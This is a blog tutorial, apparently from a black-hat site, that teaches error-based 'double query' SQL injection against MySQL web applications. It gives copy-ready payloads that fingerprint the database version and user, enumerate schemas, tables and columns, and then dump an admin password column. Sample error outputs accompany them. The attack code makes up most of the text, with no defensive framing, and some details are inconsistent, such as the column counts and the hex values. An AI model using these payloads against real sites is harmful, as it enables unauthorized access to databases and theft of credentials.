DOUBLE QUERY SQLI(ERROR BASED BLIND MYSQLI)
This my first tutorial so i don't know how to write a tut....and sorry for wrong English
let start the tutorial->>
1.To test the site its is vulnerable to sqli or not.
check on Mysql inj variable substitutions in a single quotes:
Quote:http://www.site.com/index.php?page=1'
the result should something like this:
Quote:MySQL Error: mysql_query (.......) error expretion syntax ...
2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
follow this until we get error:
http://www.site.com/news.php?id=5+order+by+1+--+ (no error)
http://www.site.com/news.php?id=5+order+by+2+--+ (no error)
http://www.site.com/news.php?id=5+order+by+3+--+ (no error)
http://www.site.com/news.php?id=5+order+by+4+--+ (no error )
http://www.site.com/news.php?id=5+order+by+5+--+ (error (we get message like this Unknown column '4' in 'order clause'
or something like that))
that means that the it has 4 columns, cause we got an error on 5.
3). Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=-5+union...,2,3,4+--+ (we already found that number of columns are 3 in section 2).
)
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works......"IF UNION WORKED SO W DON'T NEED DOUBLE QUERY"
If its give error like this
Quote:THE SELECT STATEMENT HAVE DIFFERENT NUMBER OF COLUMN...................etc
now is the time to use double query to get some information..... : )
4. To find the current database,current user,version....etc
TO find version():
here the code:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Quote:Duplicate entry '~'5.0.91-community'~1' for key 1
TO find database():
here the code:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Quote:Duplicate entry '~'database_name~1' for key 1
TO count how many database are there and try to get the name of db:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1output:
Quote:Duplicate entry '~'number of db~1' for key 1
TO print all db one by one use this code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Keep incrementing the "N" here...."LIMIT N,1"
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1 ..... till you keep getting a response.
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
TO find user():
here the code:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Quote:Duplicate entry '~'database_name@localhost'~1' for key 1
5.To count the number of tables in the selected database and print the table one by one:
To count the table in selected db:
here the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE
table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1NOTE:before doing this convert Ur db name to hex......becoze it using here in
code->>"table_schema=0xhex_code_of_database_name_which_u_selected"
Output:
Quote:Duplicate entry '~'number_of_table(e.g 10)~1' for key 1
Now to print table name one by one:
here the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1now suppose db have 10 table and u want all table name do this in above code:
Keep incrementing the "N" in code upto10 times...."LIMIT N,1"
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
.
.
LIMIT 10,1 u get all table_name of selected db
6.To get number of columns in the selected table name and print the column_name which r in table
To count column in selected table:
here the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1NOTE:before apply this see this also in code->> "table_schema=0xhex_code_of_database_name AND
table_name=0xhex_code_of_table_name"convert ur table_name and db_name to hex
example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0x074a24c45 AND
table_name=0x074a24c4523d1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
Output:
Quote:Duplicate entry '~'number_of_column(e.g 5)~1' for key 1
Now time for print column_name which r in table one by on
code here:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1now suppose db have 5 column and u want all column name do this :
Keep incrementing the "N" in code upto 5 times...."LIMIT N,1"
LIMIT0,1
LIMIT 1,1
LIMIT 2,1
.
LIMIT 5,1 u
get all column_name of selected table
example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=074a24c45
AND table_name=0x074a24c4523d1 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
7.final step To fetch records from a selected column
now we know every things table_name or column_name.........
to fetch out data here the code:
Code:
and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1note:keep incremental N here in code->>LIMIT N,1 till u get result...........
example:
suppose db name is "sandeep_1024", table name is "admin" which r in db sandeep_1024 and column name is
"password" which r in table admin know we want password
we use that code like this:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,cast(admin.password as char),0x27,0x7e) FROM `sandeep_1024`.admin LIMIT 0,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Quote:Duplicate entry '~'hack forums~1' for key 1
- See more at: http://voice0fblackhat.blogspot.com/2012/01/tutdouble-queryerror-based-blind.html#sthash.sXiWwRkX.dpuf
0 comments:
Post a Comment